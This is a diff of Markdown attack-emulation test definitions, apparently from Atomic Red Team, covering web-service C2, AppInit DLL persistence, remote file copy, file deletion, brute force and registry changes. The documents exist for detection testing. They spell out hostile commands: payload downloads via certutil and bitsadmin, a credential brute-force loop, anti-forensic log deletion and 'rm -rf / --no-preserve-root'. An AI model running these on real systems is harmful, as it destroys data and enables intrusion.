## Atomic Test #1 - Reach out to C2 Pointer URLs via command_prompt + Download data from a public website using command line **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html ``` #### Cleanup Commands: + ```cmd del %TEMP%\bitsadmindownload.html >nul 2>&1 ``` - - - -

## Atomic Test #2 - Reach out to C2 Pointer URLs via powershell + Multiple download methods for files using powershell **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Invoke-WebRequest -Uri www.twitter.com @@ -65,12 +61,9 @@ $T1102 = $wc.DownloadString("https://www.aol.com/") ``` #### Cleanup Commands: + ```powershell Clear-Variable T1102 >$null 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1103.md b/Atomic_Threat_Coverage/Triggers/T1103.md index 8766c0a8..384c5055 100644 --- a/Atomic_Threat_Coverage/Triggers/T1103.md +++ b/Atomic_Threat_Coverage/Triggers/T1103.md @@ -1,73 +1,82 @@ # T1103 - AppInit DLLs + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1103) +
Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) -The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)
+The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: +AppInit Secure Boot) ## Atomic Tests - [Atomic Test #1 - Install AppInit Shim](#atomic-test-1---install-appinit-shim) -
## Atomic Test #1 - Install AppInit Shim -AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, -you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. -This will happen regular as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the -AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. - -**Supported Platforms:** Windows - +AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the +system. Upon succesfully execution, +you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box +with a message of "Install AppInit Shim DLL was called!" appear. +This will happen regular as your computer starts up various applications and may in fact drive you crazy. A reliable way +to make the message box appear and verify the +AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you +don't keep getting message boxes showing up. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | registry_file | Windows Registry File | Path | PathToAtomicsFolder\T1103\src\T1103.reg| | registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder\T1103\src\T1103-cleanup.reg| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg.exe import #{registry_file} ``` #### Cleanup Commands: + ```cmd reg.exe import #{registry_cleanup_file} ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) + ##### Check Prereq Commands: + ```powershell if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/src/T1103.reg" -OutFile "#{registry_file}" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/src/T1103-cleanup.reg" -OutFile "#{registry_cleanup_file}" ``` + ##### Description: DLL's must exist in the C:\Tools directory (T1103.dll and T1103x86.dll) + ##### Check Prereq Commands: + ```powershell if ((Test-Path c:\Tools\T1103.dll) -and (Test-Path c:\Tools\T1103x86.dll)) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/bin/T1103.dll" -OutFile C:\Tools\T1103.dll Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/bin/T1103x86.dll" -OutFile C:\Tools\T1103x86.dll ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1105.md b/Atomic_Threat_Coverage/Triggers/T1105.md index db165cc0..2b55705b 100644 --- a/Atomic_Threat_Coverage/Triggers/T1105.md +++ b/Atomic_Threat_Coverage/Triggers/T1105.md @@ -1,8 +1,13 @@ # T1105 - Remote File Copy + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105) +
Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. -Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).
+Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote +Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with +authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) +or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076). ## Atomic Tests @@ -28,18 +33,16 @@ Adversaries may also copy files laterally between internal victim systems to sup - [Atomic Test #11 - OSTAP Worming Activity](#atomic-test-11---ostap-worming-activity) -
## Atomic Test #1 - rsync remote file copy (push) + Utilize rsync to perform a remote file copy (push) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_path | Path of folder to copy | Path | /tmp/adversary-rsync/| @@ -47,31 +50,23 @@ Utilize rsync to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive rsync | Path | /tmp/victim-files| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} ``` - - - - -

## Atomic Test #2 - rsync remote file copy (pull) + Utilize rsync to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/| @@ -79,31 +74,23 @@ Utilize rsync to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive rsync | Path | /tmp/victim-files| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} ``` - - - - -

## Atomic Test #3 - scp remote file copy (push) + Utilize scp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_file | Path of file to copy | Path | /tmp/adversary-scp| @@ -111,31 +98,23 @@ Utilize scp to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive scp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash scp #{local_file} #{username}@#{remote_host}:#{remote_path} ``` - - - - -

## Atomic Test #4 - scp remote file copy (pull) + Utilize scp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Path of file to copy | Path | /tmp/adversary-scp| @@ -143,31 +122,23 @@ Utilize scp to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive scp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash scp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` - - - - -

## Atomic Test #5 - sftp remote file copy (push) + Utilize sftp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_file | Path of file to copy | Path | /tmp/adversary-sftp| @@ -175,31 +146,23 @@ Utilize sftp to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ``` - - - - -

## Atomic Test #6 - sftp remote file copy (pull) + Utilize sftp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Path of file to copy | Path | /tmp/adversary-sftp| @@ -207,69 +170,51 @@ Utilize sftp to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive sftp | Path | /tmp/victim-files/| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` - - - - -

## Atomic Test #7 - certutil download (urlcache) + Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} ``` - - - - -

## Atomic Test #8 - certutil download (verifyctl) + Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" @@ -279,97 +224,75 @@ certutil -verifyctl -split -f #{remote_file} Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } ``` - - - - -

## Atomic Test #9 - Windows - BITSAdmin BITS Download + This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | bits_job_name | Name of the created BITS job | String | qcxjb7| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} ``` - - - - -

## Atomic Test #10 - Windows - PowerShell Download + This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Destination path to file | Path | $env:TEMP\Atomic-license.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") ``` #### Cleanup Commands: + ```powershell Remove-Item #{destination_path} -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #11 - OSTAP Worming Activity + OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd pushd #{destination_path} @@ -380,9 +303,4 @@ del AtomicTestFileT1105.js /Q >nul 2>&1 popd ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1107.md b/Atomic_Threat_Coverage/Triggers/T1107.md index d274f425..358bbe7e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1107.md +++ b/Atomic_Threat_Coverage/Triggers/T1107.md @@ -1,8 +1,13 @@ # T1107 - File Deletion + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107) +
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. -There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
+There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as +well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion +tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack +Tools) ## Atomic Tests @@ -26,351 +31,294 @@ There are tools available from the host operating system to perform cleanup, but - [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files) -
## Atomic Test #1 - Delete a single file - Linux/macOS + Delete a single file from the temporary directory **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh rm -f #{file_to_delete} ``` - - - - -

## Atomic Test #2 - Delete an entire folder - Linux/macOS + Recursively delete the temporary directory and all files contained within it **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh rm -rf #{folder_to_delete} ``` - - - - -

## Atomic Test #3 - Overwrite and delete a file with shred + Use the `shred` command to overwrite the temporary file and then delete it **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh shred -u #{file_to_shred} ``` - - - - -

## Atomic Test #4 - Delete a single file - Windows cmd + Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd del /f #{file_to_delete} ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) + ##### Check Prereq Commands: + ```cmd IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` + ##### Get Prereq Commands: + ```cmd echo deleteme_T1107 >> #{file_to_delete} ``` - - -

## Atomic Test #5 - Delete an entire folder - Windows cmd + Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rmdir /s /q #{folder_to_delete} ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete}) + ##### Check Prereq Commands: + ```cmd IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` + ##### Get Prereq Commands: + ```cmd mkdir #{folder_to_delete} ``` - - -

## Atomic Test #6 - Delete a single file - Windows PowerShell -Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - -**Supported Platforms:** Windows - +Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use +File Explorer to verify the file was deleted. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1107| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Remove-Item -path #{file_to_delete} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_to_delete} | Out-Null ``` - - -

## Atomic Test #7 - Delete an entire folder - Windows PowerShell -Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - -**Supported Platforms:** Windows - +Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. +Use File Explorer to verify the folder was deleted. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1107| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Remove-Item -Path #{folder_to_delete} -Recurse ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{folder_to_delete} -Type Directory | Out-Null ``` - - -

## Atomic Test #8 - Delete Filesystem - Linux -This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - -**Supported Platforms:** Linux - +This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid +analysis. This test is dangerous and destructive, do NOT use on production equipment. +**Supported Platforms:** Linux - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash rm -rf / --no-preserve-root > /dev/null 2> /dev/null ``` - - - - -

## Atomic Test #9 - Delete-PrefetchFile -Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" + +Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, +Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) ``` - - - - -

## Atomic Test #10 - Delete TeamViewer Log Files + Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. -This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer -log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. +This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching +the TeamViewer +log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the +folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Remove-Item #{teamviewer_log_file} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{teamviewer_log_file} | Out-Null ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1110.md b/Atomic_Threat_Coverage/Triggers/T1110.md index 86471273..cca0e6d2 100644 --- a/Atomic_Threat_Coverage/Triggers/T1110.md +++ b/Atomic_Threat_Coverage/Triggers/T1110.md @@ -1,14 +1,27 @@ # T1110 - Brute Force + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110) +
Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. -[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking) +[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an +adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to +systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow +table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. ( +Citation: Wikipedia Password cracking) -Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) +Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with +zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause +numerous authentication failures and account lockouts, depending on the organization's login failure policies. ( +Citation: Cylance Cleaver) -A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) +A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that +matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password +and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single +account with many passwords. (Citation: BlackHillsInfosec Password Spraying) -Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following: +Typically, management services over commonly used ports are used when password spraying. Commonly targeted services +include the following: * SSH (22/TCP) * Telnet (23/TCP) @@ -23,27 +36,27 @@ Typically, management services over commonly used ports are used when password s * MySQL (3306/TCP) * VNC (5900/TCP) -In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) +In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing +federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: +US-CERT TA18-068A 2018) - -In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
+In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates +Windows "logon failure" event ID 4625. ## Atomic Tests - [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials) -
## Atomic Test #1 - Brute Force Credentials + Creates username and password files then attempts to brute force on remote host **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt| @@ -51,9 +64,7 @@ Creates username and password files then attempts to brute force on remote host | remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$| | domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net user /domain > #{input_file_users} @@ -63,9 +74,4 @@ echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1112.md b/Atomic_Threat_Coverage/Triggers/T1112.md index 70d3a1e0..6a12dff1 100644 --- a/Atomic_Threat_Coverage/Triggers/T1112.md +++ b/Atomic_Threat_Coverage/Triggers/T1112.md @@ -1,12 +1,24 @@ # T1112 - Modify Registry + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1112) +
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. -Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples). +Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The +built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote +Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may +contain functionality to interact with the Registry through the Windows API (see examples). -Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) +Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which +will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities +using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal +payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding +Reg Jul 2017) -The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.
+The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires +the remote Registry service to be running on the target system. (Citation: Microsoft Remote) +Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote +system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication. ## Atomic Tests @@ -20,123 +32,107 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry) -
## Atomic Test #1 - Modify Registry of Current User Profile - cmd -Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." -will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. - -**Supported Platforms:** Windows - - - +Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The +operation completed successfully." +will be displayed. Additionally, open Registry Editor to view the new entry in +HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f ``` #### Cleanup Commands: + ```cmd reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 ``` - - - -

